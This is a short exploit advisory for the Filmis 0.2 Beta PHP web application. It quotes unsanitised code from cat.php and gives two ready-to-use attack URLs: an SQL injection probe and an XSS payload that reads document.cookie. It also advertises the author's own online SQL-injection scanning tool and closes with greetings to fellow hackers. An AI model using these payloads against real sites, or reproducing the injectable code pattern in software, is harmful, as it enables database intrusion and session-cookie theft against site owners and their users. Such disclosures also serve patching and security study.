Filmis 0.2 Beta Cross Site Scripting / SQL Injection

`===================================================================================  
  
Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities  
  
===================================================================================  
  
# Exploit Title: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities  
  
# Author: M.Jock3R  
  
# USE MY ONLINE SQLI SCAN TOOL[CODED By ME] : http://dzcode.tk/sql.php (To discover that such exploit)  
  
# Download Script(Official site): http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip  
  
# Category:: webapps  
  
# Tested on: windows XP Sp2 FR  
  
  
  
===================================================================================  
  
  
  
Vuln file : cat.php  
  
  
  
Vuln Code :  
  
----------  
  
$idcat = $_GET['id'];  
  
$nbitemparpage= "28";  
  
if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }  
  
$nbd = ceil(($nb -1) * $nbitemparpage);  
  
$amem = mysql_query("SELECT * FROM ".$prefix."film");  
  
  
  
Exploit:  
  
---------  
  
1/SQL INJECTION :  
  
http://localhost/filmis/cat.php?nb=-1'  
  
  
  
2/XSS :  
  
http://localhost/filmis/cat.php?nb=1><script>alert(document.cookie)</script>  
  
  
  
===================================================================================  
  
Greets To :  
  
adelsbm / attiadona / Wprojects.tk  
  
  
  
Email : [email protected]  
  
  
  
THANKS TO ALL ALGERIANS HACK3RS  
  
===================================================================================  
  
`